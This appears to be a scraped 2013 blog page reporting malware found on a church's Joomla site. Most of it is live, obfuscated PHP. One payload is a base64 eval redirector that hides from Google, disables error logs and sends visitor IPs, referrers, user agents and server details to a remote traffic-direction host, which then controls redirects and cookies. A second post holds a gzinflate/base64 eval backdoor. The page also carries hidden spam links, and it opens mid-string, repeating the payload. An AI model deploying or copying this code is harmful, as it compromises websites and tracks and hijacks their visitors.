cHR5KCRnb3RvKSkgeyAkZ290bz1iYXNlNjRfZGVjb2RlKCR3ZWV1dmZjdnVja2N4ayk7IH0NCn0gZWxzZSB7ICRnb3RvPWJhc2U2NF9kZWNvZGUoJHdlZXV2ZmN2dWNrY3hrKTsgfQ0KLy8gLS0tQ09NTUVOVDgtLS0NCn19IGVsc2Ugew0KJG91dCA9ICJHRVQgIi4kX2xpbmsuIiBIVFRQLzEuMFxyXG4iOw0KJG91dCAuPSAiSG9zdDogIi4kZG9tLiJcclxuIjsNCiRvdXQgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KZndyaXRlKCRmcCwgJG91dCk7DQp3aGlsZSAoIWZlb2YoJGZwKSkgew0KJHN0cj1mZ2V0cygkZnAsMTI4KTsNCmlmICgkc3RyPT0iXHJcbiIgJiYgZW1wdHkoJGhlKSkgeyAkaGUgPSAnZG8nOyB9DQppZiAoJGhlPT0nZG8nKSB7ICRnb3RvLj0kc3RyOyB9DQp9DQpmY2xvc2UgKCRmcCk7DQokZ290bz1zdWJzdHIoJGdvdG8sIDIpOw0KfQ0KLy8gLS0tQ09NTUVOVDktLS0NCiRnb3RvZSA9IGV4cGxvZGUoIjovLyIsIHRyaW0oJGdvdG8pKTsNCmlmKCRnb3RvZVswXT09J2h0dHAnIHx8ICRnb3RvZVswXT09J2h0dHBzJykgeyBoZWFkZXIoJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddLicgMzAyIEZvdW5kJyk7IGhlYWRlcignTG9jYXRpb246ICcudHJpbSgkZ290bykpOyB9DQppZigkZ290b2VbMF09PSdjb29rJykgeyAkZ290b2VlPWV4cGxvZGUoIiYiLCAkZ290b2VbMV0pOyBmb3JlYWNoKCRnb3RvZWUgYXMgJHNldGNvb2spIHsgJHNldD1leHBsb2RlKCI9IiwgJHNldGNvb2spO3NldGNvb2tpZSgkc2V0WzBdLCAkc2V0WzFdKTsgfSB9DQppZigkZ290b2VbMF09PSdlY2hvJykgeyBpZiAocHJlZ19tYXRjaCgnLzQwNFwtbm90fDQwNCBOb3QgRm91bmQvaXN1JywkZ290b2VbMV0pKSB7IGhlYWRlcigkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10uJyA0MDQgTm90IEZvdW5kJyk7IGhlYWRlcignU3RhdHVzOiA0MDQgTm90IEZvdW5kJyk7IH0gZWNobyAkZ290b2VbMV07IH0NCi8vIC0tLUNPTU1FTlQxMC0tLQ==";eval($psdtxfned($ydazyxb));
?>
$psdtxfned=strrev("edoced_46esab");$ydazyxb="Ly9Db25mR3VpDQovLyBzNiF6WjFFeThFRHE1LU0oWU41MlM9clhQS004QjhlUE1kclFHNFFLZ0FfRTFHNFZZKHVGUi1oeGVQWUstY3FReTNYeW41Q1B1VWttaCM0OVQjNzAyWCMtWkBTaE5udEYxU2R0MUUzKmF6NldUa25oYXJlUVlxSDVRKUBYRUgta055QlVZa1piUEswMSthUSlyODFBUnRmQlAuVHdRaDZwZjdLVSpLJDVNIVdGcjY0IzVTRjg5UXpweHpfekhudE5EKUMyKEFkQl5HaHVAYSRFKy1SSHV5YjRnKlAhWmhBZ1JUPU5ROS0uU1JWaGFQX0d5ZC0NCmlmKHN0cnBvcygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sJ0dvb2dsZScpICE9PSBmYWxzZSkgew0KICAgIGhlYWRlcignSFRUUC8xLjAgNDA0IE5vdCBGb3VuZCcpOw0KICAgIGV4aXQ7DQp9DQppZihzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdTZWFyY2hpbmcuNzc3JykgIT09IGZhbHNlKSB7DQogICAgaGVhZGVyKCRfU0VSVkVSWydTRVJWRVJfUFJPVE9DT0wnXS4nIDMwMiBGb3VuZCcpOw0KICAgIGhlYWRlcignTG9jYXRpb246IGh0dHA6Ly9iaW5nLmNvbS8nKTsNCiAgICBleGl0Ow0KfQ0KQGVycm9yX3JlcG9ydGluZygwKTsNCkBpbmlfc2V0KCdlcnJvcl9sb2cnLE5VTEwpOw0KQGluaV9zZXQoJ2xvZ19lcnJvcnMnLDApOw0KQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7DQpAaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCBmYWxzZSk7DQpAc2V0X3RpbWVfbGltaXQoMCk7DQovLyBFLXptU0hmbVpZRl5hN1pBZzU0UlYuMHNHLSg9bXM0dzRYRDg1ZE0xQSQ3LWchbl4jZDVOeWYpbWc0XnNkZGRxRGE1RWgpS0ZDVng2JF8rZjMtKlVCOEheNGV5RlpwbmgrZjU0UCF6LTB1cFYhNTcNCiRtb2RlPSRfR0VUWyJtb2RlIl07DQppZigkbW9kZT09ImNvbmZpZyIgQU5EICRtZ3NrYWZ4c215cnZhPT0kX0dFVFsna2V5J10pew0KZWNobyAnPGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPWh0dHA6Ly8nLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4kX1NFUlZFUlsnU0NSSVBUX05BTUUnXS4nP21vZGU9c2V0Y29uZmlnJmtleT0nLiRfR0VUWydrZXknXS4nPg0KPHRhYmxlIGJvcmRlcj0iMCI+PHRyPjx0ZD5URFM8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icHRkcyIgdmFsdWU9IicuYmFzZTY0X2RlY29kZSgkcWtkZXF3bWNjZ2tmKS4nIj48L3RkPjx0ZD5URFMgSVA8L3RkPg0KPHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSInLiRxZGVzcnpncWRkeW5uZS4nIj48L3RkPjx0ZD5LRVk8L3RkPjx0ZD48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0icGtleSIgdmFsdWU9IicuJG1nc2thZnhzbXlydmEuJyI+PC90ZD4NCjwvdHI+PHRyPjx0ZD5SZXNlcnZlPC90ZD48dGQ+PGlucHV0IHR5cGU9InRleHQiIG5hbWU9InB0byIgdmFsdWU9IicuYmFzZTY0X2RlY29kZSgkd2VldXZmY3Z1Y2tjeGspLiciPjwvdGQ+PHRkPkVTRCBJRDwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwZXNkaWQiIHZhbHVlPSInLiRoaHR1cy4nIj48L3RkPg0KPHRkIGNvbHNwYW49IjIiPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3RkPjwvdHI+PC90YWJsZT48L2Zvcm0+JzsNCmRpZSgpOw0KfQ0KLy8gNF53KC5zMlBBbi1YViFYMU5wOFJza1BQQkRNTVheVXZYKi1ScWFVUUQ5UU4oSDUxYyMrX210QFo5bXhLMVltLU1jKU1DRUIzMzIySzRyWW0qa0RSclB5bUV6azRTN20waGF3aCpQMSpAZE5ObmhNVipGOTRHPTg0NGQwYkVuRWVRQGtkNmE1YzJ3dnoxM1UyXlQpaEU9OWYrR14xQkghLXM0QEJoKUhOYVorOWEueGYkQDB4DQppZigkbW9kZT09InNldGNvbmZpZyIgQU5EICRtZ3NrYWZ4c215cnZhPT0kX0dFVFsna2V5J10pew0KJHNuPWV4cGxvZGUoIi8iLCAkX1NFUlZFUlsnU0NSSVBUX05BTUUnXSk7DQpmb3JlYWNoKCRzbiBhcyAkc25uKXskc2NyPSRzbm47fQ0KJGdldGxwYT1maWxlKCRzY3IpOw0KJHN0cm5nPSRnZXRscGFbMF07DQokZmlsZT1maWxlKCRzY3IpOyANCmZvcigkaT0wOyRpPHNpemVvZigkZmlsZSk7JGkrKykNCmlmKCRpPT0wKSB7DQoka2E9JycuYmFzZTY0X2RlY29kZSgnUEQ5d2FIQT0nKS4nIC8vR1VXJzsNCiRrYWthPSRrYS4nUEdVLy8gJy5iYXNlNjRfZGVjb2RlKCdQejQ9JykuJyc7DQokZmVscCA9IGV4cGxvZGUoJGtha2EsICRmaWxlWyRpXSk7DQokZmlsZVskaV09JycuYmFzZTY0X2RlY29kZSgnUEQ5d2FIQT0nKS4nICRxa2RlcXdtY2Nna2Y9IicuYmFzZTY0X2VuY29kZSgkX1BPU1RbInB0ZHMiXSkuJyI7ICRxZGVzcnpncWRkeW5uZT0iJy4kX1BPU1RbInB0ZHNpcCJdLiciOyAkd2VldXZmY3Z1Y2tjeGs9IicuYmFzZTY0X2VuY29kZSgkX1BPU1RbInB0byJdKS4nIjsgJGhodHVzPSInLiRfUE9TVFsicGVzZGlkIl0uJyI7ICRtZ3NrYWZ4c215cnZhPSInLiRfUE9TVFsicGtleSJdLiciOyAnLmJhc2U2NF9kZWNvZGUoJ1B6ND0nKS4nJy4ka2FrYS4kZmVscFsxXTsNCn0NCiRmcD1mb3Blbigkc2NyLCJ3Iik7IA0KZnB1dHMoJGZwLGltcGxvZGUoIiIsJGZpbGUpKTsNCmZjbG9zZSgkZnApOw0KfQ0KLy8gRSNWMGgyZmEyYUQoY3pxSHF0ZVRuN25nXzdEKiNBKlc5Vk1tTkIqUzd0Y1ltclR3ZDlNRHVRSC5mUD14PVM1MnBkWGc9dlZTKjdXNHpHVUBmNnNUZyotM3EjeGFOZXd4Z3Y1R1M4UWg9ODlSNmEtVCpIeVpiNytYdChNQkAjZjM5QjZkZnRQRENFX1k0SHEjckFWWUEkXnI3bWRnNzE3NkFEZDFDYkVHWGtaX0cxZHQuK2VNVXVVQFdfTlBSZUFFPTEtdUcrLTAheldHWW1rZTYzZEZ5Tm1IQjQyV2hAViQrUTkyNktiX1koTmtUVVFCVTBWej1YLlJkdSFkWEF3YVp0cy5uNHhhPVdxYTB1UFh0Nm0xcio5UUNFbUNYZkRBKihSZXdmRGJmbmZOU3FoRSkrN1RkKXFHWCRWZkhOS3RZZ3gtMit0UThjeEFFTkNSX1UxdioodjBLWE15MHhtc0NVZDJSRlEkeHZSS1hZZUIhVShNd3d0Rm5GNGgwYipXQGVmZjd5Ny1fZ3lOMFAwKG0rUUJhSzlNeEExODR5NEByS045cnF5ZHg4KFVwKHIxejJAQ1oyZXFTeF5AXylVeVFXSHlEdyooZjVjbSpUMVBmLSkoKnM4UzlaJDJudSMxWXctWFckIXZebmJQYUJ1OF9CQVAqMDBWNGR3eitfRzcudWsjOVdWZUNaMFhDLWtCckYuMkBWITUqSHpwUnBedCpQI25DMGt2bSNGOFoxRl44UitnYVkuXkVlYWQkNzVTaDlBQm4xcWJBUy00Yzl2RVZYcGdXZTl2eHgtMTRrdnV0Nmgxd2tIbUJ2d2FAS0tBJFVOZVdhRlYtRnhTSFZTXzctbkMhKTBxQk5xQkdiVGtUVm4tRzJLRVokOVdDIS1hS049c01uKik2SHlQS3ZjejNhQjNycyk1dTYkU1ltNXVVMDRDY2JndTRAOTk1SF9jMy5RUThoX0grMEhaaDAyTjVLNG1jbWZwRDRHIUskNVFoUE5CWGNxLiQxWTJ4LkhhUGguNigrcDUoNShlYXFRQ3FNKnRDZil1XlpobnNBeEczZHFaQDAyZl90RE1xeWNrTiRrKkE4VilWQjMjRWJzUXZZWkBGKll3KCRjTiNnK0gtVWs9MXF5NVY2YkRiKEJoXg0KLy9zZW5kDQppZihlbXB0eSgkcWRlc3J6Z3FkZHlubmUpKSB7JGRvbSA9IGV4cGxvZGUoIi8iLCBiYXNlNjRfZGVjb2RlKCRxa2RlcXdtY2Nna2YpKTsgJGRvbT0kZG9tWzJdO30gZWxzZSB7JGRvbT0kcWRlc3J6Z3FkZHlubmU7fQ0KZnVuY3Rpb24gZ2V0VXNlcklwKCkgew0Kc3RhdGljICRmb3J3YXJkZWQgPSBhcnJheSgNCi8vJ0hUVFBfQ0xJRU5UX0lQJywNCi8vJ0hUVFBfWF9GT1JXQVJERURfRk9SJywNCi8vJ0hUVFBfWF9GT1JXQVJERUQnLA0KLy8nSFRUUF9YX1JFQUxfSVAnLA0KLy8nSFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQJywNCi8vJ0hUVFBfRk9SV0FSREVEX0ZPUicsDQovLydIVFRQX0ZPUldBUkRFRCcsDQonUkVNT1RFX0FERFInDQopOw0KZm9yZWFjaCAoJGZvcndhcmRlZCBhcyAka2V5KSB7DQppZiAoIWZ1bmN0aW9uX2V4aXN0cygnYXJyYXlfa2V5X2V4aXN0cycpKSB7IHJldHVybiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsgfQ0KaWYgKCFmdW5jdGlvbl9leGlzdHMoJ3NzY2FuZicpKSB7IHJldHVybiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsgfQ0KaWYgKCFmdW5jdGlvbl9leGlzdHMoJ2ZpbHRlcl92YXInKSkgeyByZXR1cm4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107IH0NCmlmIChhcnJheV9rZXlfZXhpc3RzKCRrZXksICRfU0VSVkVSKSkgeyBzc2NhbmYoJF9TRVJWRVJbJGtleV0sICclW14sXScsICRpcCk7DQppZiAoZmlsdGVyX3ZhcigkaXAsIEZJTFRFUl9WQUxJREFURV9JUCwgRklMVEVSX0ZMQUdfTk9fUFJJVl9SQU5HRSB8IEZJTFRFUl9GTEFHX05PX1JFU19SQU5HRSkgIT09IGZhbHNlKSB7IHJldHVybiAkaXA7DQp9fX0gcmV0dXJuICRfU0VSVkVSWydSRU1PVEVfQUREUiddOyB9DQpmdW5jdGlvbiBnZXRVc2VySXBzKCkgeyByZXR1cm4gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pOyB9DQovLyBZbXR3KUtAdzNmPUNUcTBnSGNrXnlwbmFBeHNDcU0pcXk0QHBVc3NNc0AtWipFdkgyKz1BeEtYSCljMlkrPShwdFc4VGc2YUQtZ15XY3dxem1tSGcuXkVYbVI5ZSojZkU0TSQjUCFYKVQwOClmVVNeVWQ4a3JRR25FQEE2eFVBZVQ9d2U3dGYpbT0yIzYzOXNXZ2FTNjdNYjQyRGYrbkBzJHVDUmFiZ2ZLeEQubnkoWlQ1YjlCPUB5U3ViK0RzMCN2eDJuPTl3XjhTMmV5PVR3aC1EPWY3c1B1WGIpSEhxYXNRZU5heGNkSF5VWFVeazhtOGFTZmtzRC5XNz0oYlUqQjkqYmttMEA0QDhGdFg1Y2VUUnVCR2JxVitYY215VEM1OXo5KEFtRGNfcHI5QFFkWlFmY0tmLj1tVE5YKFNIVXozPSgycHIxdCRXSz1uRUhOd3ZGRHY2YU1kUmVIR2coenB3ayM2dlZFZW45KzchdkYyV20uZ3U1c2djQXNXWDMkV0swLVQ2YzU9XktuVmZ1VUYqKTNfRXVQZUgzbndwQTEhRXApR2c9X1RoKisxNllueGs9Mk4wQ3FyUFdheUA9KERyJFl1OHc4TjJjWlY9NkhUOG5NYWUjTnJVXjEpMy4zeCo1IzEoNyFOZEhXcWNkTUEwbilOQitObUU3TUFCWD02Y3JUKFc3ZERFcjBWQlREM0ttZylwMkJuOFVQQEZlWVVeMlcpQ1FrUTJlS043VTFAIzhfWEJFU05abWNVaCQhOF5GNyp2V3RHeFRtYWIhZiRxaGtBLlhHZVM3XyRGY2ZfUjgwa3pOdWZmVWhkSHFmPSFNZzFaYUZadkhYdTVAWTNLNWZadTkkRF4hZkM3clFyeCl6Qk4xckFwV0gkYXJobUNLQnBRYVR6NTYzWUAkWTFBLnpkX0I5VUFxK2QqJCR4TlYkTXVAKFp4a2ZwJC09dzBAekY5LjdeS3dWNzANCmlmKCFlbXB0eSgkX1NFUlZFUlsnU0VSVkVSX1BPUlQnXSkpIHskdF9zZXJ2ZXJfcG9ydD11cmxlbmNvZGUoJF9TRVJWRVJbJ1NFUlZFUl9QT1JUJ10pO30gZWxzZSB7ICR0X3NlcnZlcl9wb3J0PScnOyB9DQppZighZW1wdHkoJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10pKSB7JHRfc2VydmVyX2FkZHI9dXJsZW5jb2RlKCRfU0VSVkVSWydTRVJWRVJfQUREUiddKTt9IGVsc2UgeyAkdF9zZXJ2ZXJfYWRkcj0nJzsgfQ0KaWYoIWVtcHR5KCRfU0VSVkVSWydTRVJWRVJfU09GVFdBUkUnXSkpIHskdF9zZXJ2ZXJfc29mdHdhcmU9dXJsZW5jb2RlKCRfU0VSVkVSWydTRVJWRVJfU09GVFdBUkUnXSk7fSBlbHNlIHsgJHRfc2VydmVyX3NvZnR3YXJlPScnOyB9DQokdF9kb209dXJsZW5jb2RlKCdodHRwOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1NDUklQVF9OQU1FJ10pOw0KJHRfcmVmPXVybGVuY29kZSgkX1NFUlZFUltIVFRQX1JFRkVSRVJdKTsNCiR0X2lwPXVybGVuY29kZShnZXRVc2VySXAoKSk7DQokdF9wcm94PSdubyc7aWYoJF9TRVJWRVJbIkhUVFBfWF9GT1JXQVJERURfRk9SIl0peyR0X3Byb3g9J3llcyc7fQ0KJHRfYWdlbnQ9dXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7DQovL2ZvcmVhY2goJF9DT09LSUUgYXMgJGtleT0+JHZhbCkgeyR0X2Nvb2tpZT0kdF9jb29raWUuIiYiLiRrZXkuIj0iLiR2YWw7fQ0KLy8kdF9jb29raWU9dXJsZW5jb2RlKCR0X2Nvb2tpZSk7DQppZighZW1wdHkoJF9TRVJWRVJbJ1FVRVJZX1NUUklORyddKSkgeyR0X2Nvb2tpZT11cmxlbmNvZGUoJF9TRVJWRVJbJ1FVRVJZX1NUUklORyddKTt9DQplbHNlIGlmKCFlbXB0eSgkX1NFUlZFUlsnUEFUSF9JTkZPJ10pKSB7JHRfY29va2llPXVybGVuY29kZSgkX1NFUlZFUlsnUEFUSF9JTkZPJ10pO30NCmVsc2UgeyAkdF9jb29raWU9Jyc7IH0NCiRfbGluaz1iYXNlNjRfZGVjb2RlKCRxa2RlcXdtY2Nna2YpLiI/c2VydmVyX3BvcnQ9Ii4kdF9zZXJ2ZXJfcG9ydC4iJnNlcnZlcl9hZGRyPSIuJHRfc2VydmVyX2FkZHIuIiZzZXJ2ZXJfc29mdHdhcmU9Ii4kdF9zZXJ2ZXJfc29mdHdhcmUuIiZkb209Ii4kdF9kb20uIiZyZWY9Ii4kdF9yZWYuIiZpcD0iLiR0X2lwLiImcHJveD0iLiR0X3Byb3guIiZhZ2VudD0iLiR0X2FnZW50LiImY29va2llPSIuJHRfY29va2llLiImZXNkaWQ9Ii4kaGh0dXM7DQokZnAgPSBmc29ja29wZW4oJGRvbSwgODAsICRlcnJubywgJGVycnN0ciwgMzApOw0KQHN0cmVhbV9zZXRfdGltZW91dCgkZnAsIDMwKTsNCi8vIEVjcFhfLllzVmFzbjM4KWFSQ2NuSGI4Qih1clZfJD1WdkBjXihzblgqNkJ4TV96TS5Qem5ONT1kUjgyV15HZVorQzhfPTQ0WF9yXkt6aCFXRF9hIyRxbmJkdThnXnRYRnJCRWZ1M21TeFN6XkJyRjg3LUMyME5UKkBZMSluM1B2PWhyNy0jRUB3ZHJRQ242PUZ1KiNQQlIqMz1LejFFZ2NCcDQuK3dLN2ZwIzNnRUhLWi4uV3FtMXdOd2RiUTEqeG5LMFM2eUMjKy1ockU9eEcoR3FUWFAyLkUzRFgwbTIwMVF2JClUU0t0WVFtMHdkR2RLTVNOSFpxSDhQUndzIz1hUSt3dGI9QEV3MylxMzhlY0sueDhOND1ZbVJfd0VWaFhWQStoSCRkQEhhR2NaQ3FaMndjPShVKXVyYnBzZ2J2U3FhOCFmbTI1PUs1RjdjcWcyQHU3RysocCNXWXEuZF9mZGFfKFg5dV9idjleKEVfV3QyeUt1eEA1cHlzNHItdnV5a1A1N2hGOEctXnlSPXFhKUdWcDheOWhUVVBlYlFybiFxZHNXNkMtK0MzYTV5MlBwQno2Y2gjREJAZWhRUEFWVjB0VjliVmUhK0MqNU4wVFo5WTIjcypmZFZrOGNNNDdtVjVQQEAuNVhVUGdyOHEhZVlAKTJBbXRzeSEkQjBHeHFERk1fQlRtcHouVjNCRyRUIyhmaDcjKW4uZiFoUG1lPW1BXygkcD1LQVcjZ3RRZlVaRiRxKXcqTiNON1plNTAodWdCd0hZMU5RZ01IVkUwMUFaKjUyUlpoRk5IKSFTK1hrI01WcThZMG0rdjZXbUJxUTlOTV56Yy1IREZxTm1SVy49NSt1RFVmQ0haNmFUTVkoRVpNRF8kNypGKnYtMHAkXmRyIzJQZVIuUF9rWkZrWiNLRXEhWVRhM25EdzlFLmM4ZVokcXVmckM0a0N2QjF4c1cxQzYrX2VObm1IZ3hrRmVIeW1mQGtnKC1Sdktuc3VaQzVNQi5tUQ0KaWYgKCEkZnApIHsNCmlmIChmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpKSB7DQokY2ggPSBjdXJsX2luaXQoKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCBmYWxzZSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIHRydWUpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJF9saW5rKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgIjYwIik7DQokZ290byA9IGN1cmxfZXhlYygkY2gpOyBjdXJsX2Nsb3NlKCRjaCk7DQppZiAoZW1wdHkoJGdvdG8pKSB7IGlmIChmdW5jdGlvbl9leGlzdHMoJ2ZpbGVfZ2V0X2NvbnRlbnRzJykpIHsNCiRjdHggPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoYXJyYXkoJ2h0dHAnID0+IGFycmF5KCd0aW1lb3V0JyA9PiA5MCkpKTsNCiRnb3RvPWZpbGVfZ2V0X2NvbnRlbnRzKCRfbGluaywgMCwgJGN0eCk7DQppZiAoZW1wdHkoJGdvdG8pKSB7ICRnb3RvPWJhc2U2NF9kZWNvZGUoJHdlZXV2ZmN2dWNrY3hrKTsgfQ0KfSBlbHNlIHsgJGdvdG89YmFzZTY0X2RlY29kZSgkd2VldXZmY3Z1Y2tjeGspOyB9fQ0KLy8gVUN6MENxciRec21wc1Jkc2tjMUdUWTcNCn0gZWxzZSB7DQppZiAoZnVuY3Rpb25fZXhpc3RzKCdmaWxlX2dldF9jb250ZW50cycpKSB7DQokY3R4ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKGFycmF5KCdodHRwJyA9PiBhcnJheSgndGltZW91dCcgPT4gOTApKSk7DQokZ290bz1maWxlX2dldF9jb250ZW50cygkX2xpbmssIDAsICRjdHgpOw0KaWYgKGVtcHR5KCRnb3RvKSkgeyAkZ290bz1iYXNlNjRfZGVjb2RlKCR3ZWV1dmZjdnVja2N4ayk7IH0NCn0gZWxzZSB7ICRnb3RvPWJhc2U2NF9kZWNvZGUoJHdlZXV2ZmN2dWNrY3hrKTsgfQ0KLy8gLS0tQ09NTUVOVDgtLS0NCn19IGVsc2Ugew0KJG91dCA9ICJHRVQgIi4kX2xpbmsuIiBIVFRQLzEuMFxyXG4iOw0KJG91dCAuPSAiSG9zdDogIi4kZG9tLiJcclxuIjsNCiRvdXQgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KZndyaXRlKCRmcCwgJG91dCk7DQp3aGlsZSAoIWZlb2YoJGZwKSkgew0KJHN0cj1mZ2V0cygkZnAsMTI4KTsNCmlmICgkc3RyPT0iXHJcbiIgJiYgZW1wdHkoJGhlKSkgeyAkaGUgPSAnZG8nOyB9DQppZiAoJGhlPT0nZG8nKSB7ICRnb3RvLj0kc3RyOyB9DQp9DQpmY2xvc2UgKCRmcCk7DQokZ290bz1zdWJzdHIoJGdvdG8sIDIpOw0KfQ0KLy8gLS0tQ09NTUVOVDktLS0NCiRnb3RvZSA9IGV4cGxvZGUoIjovLyIsIHRyaW0oJGdvdG8pKTsNCmlmKCRnb3RvZVswXT09J2h0dHAnIHx8ICRnb3RvZVswXT09J2h0dHBzJykgeyBoZWFkZXIoJF9TRVJWRVJbJ1NFUlZFUl9QUk9UT0NPTCddLicgMzAyIEZvdW5kJyk7IGhlYWRlcignTG9jYXRpb246ICcudHJpbSgkZ290bykpOyB9DQppZigkZ290b2VbMF09PSdjb29rJykgeyAkZ290b2VlPWV4cGxvZGUoIiYiLCAkZ290b2VbMV0pOyBmb3JlYWNoKCRnb3RvZWUgYXMgJHNldGNvb2spIHsgJHNldD1leHBsb2RlKCI9IiwgJHNldGNvb2spO3NldGNvb2tpZSgkc2V0WzBdLCAkc2V0WzFdKTsgfSB9DQppZigkZ290b2VbMF09PSdlY2hvJykgeyBpZiAocHJlZ19tYXRjaCgnLzQwNFwtbm90fDQwNCBOb3QgRm91bmQvaXN1JywkZ290b2VbMV0pKSB7IGhlYWRlcigkX1NFUlZFUlsnU0VSVkVSX1BST1RPQ09MJ10uJyA0MDQgTm90IEZvdW5kJyk7IGhlYWRlcignU3RhdHVzOiA0MDQgTm90IEZvdW5kJyk7IH0gZWNobyAkZ290b2VbMV07IH0NCi8vIC0tLUNPTU1FTlQxMC0tLQ==";eval($psdtxfned($ydazyxb));
?>
Saturday, December 14, 2013
Malware found on a Joomla driven website
Today, I found this malicious code on a Church's website, driven by Joomla.
<div style="display:none"><a href="http://www.sikayetvar.com/firma/detay/fuga-mobilya" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2137094/fuga-mobilya-zamaninda-teslimat-yapmadi/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2108657/fuga-mobilya-gec-teslimat-yapiyor/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2080660/fuga-mobilyadan-aldigim-koltuk-ses-cikariyor/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2048411/fuga-mobilya-hatali-urun-getirdi/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/2045973/fuga-mobilya-urunleri-teslim-edemiyor/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1996547/fuga-mobilya-gecikmeli-teslimat/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1993556/fuga-mobilya-teslimat-yapmiyor/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1993798/fuga-mobilya-gec-teslimat/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1972065/fuga-mobilya-teslimat-yapilmiyor/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1861963/fuga-mobilya-musteri-hizmeti-cok-kotu/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1840619/fuga-mobilya-esyalar-teslim-edilmiyor/" title="fuga mobilya">fuga mobilya</a></div> <div style="display:none"><a href="http://www.sikayetvar.com/sikayet/detay/1566776/fuga-mobilya-kumas-istedigimiz-gibi-cikmadi" title="fuga mobilya">fuga mobilya</a></div>
Friday, May 31, 2013
Backdoor Script
<?php eval(gzinflate(base64_decode("BcFJkqowAADQu/Squ1xAlLG6eiEiCjIaBnHzC0kYgxiCgJz+v4enjHyXa/0sSDbi70fGsCT8QzjvEf7+0nLDamk/7/d68Oaul5qPDmang0NrnCJkascQc3MNG/10DMKJK+AWQVkVH0pOqEMzuXa1SPAVkqG5k7DwLERwNl+dfW8EzZ7MunM2TH+X0F8PymkdniEvp51cFrFg1JnnAMWrlSdL14aMGnQf/l0UumFrsaXIi8Q95ejF/Hi6Hp+kTvDAnFnivY5VEifzytAp8KDnEvIwuHOzFHsU1KmaNM86jsYWj+zmKvYuBNkHNPv6NXkRsw1tiicE7eFYJVReF/14tVSNitkYaJYgTwEgwDl3drtZtJWo5cmFyIBhYdJ34D+cih8vmWfn1/PQw+zKy/5yGgzZ7q3qfLvbRcRQjUkLJUezqDe4R4Qmc9eFUA5K1JE73HPOk6ekKjFdZpTk9mDLNIh7zKDHN8mCxFJIRGlh5r6FqpbdycsNrLAHa9r1ieOyXoh6DlScukUfck7NtypWurirga7AzkszOheMNnXE580GtTczomgrodwvPQTKZAT7j2heuFvv27JREPUyvyL3bMa0+lgtr1wdrB3SmEU3ebvhdlMx//19/fz8/P4H"))); ?>
Subscribe to:
Posts (Atom)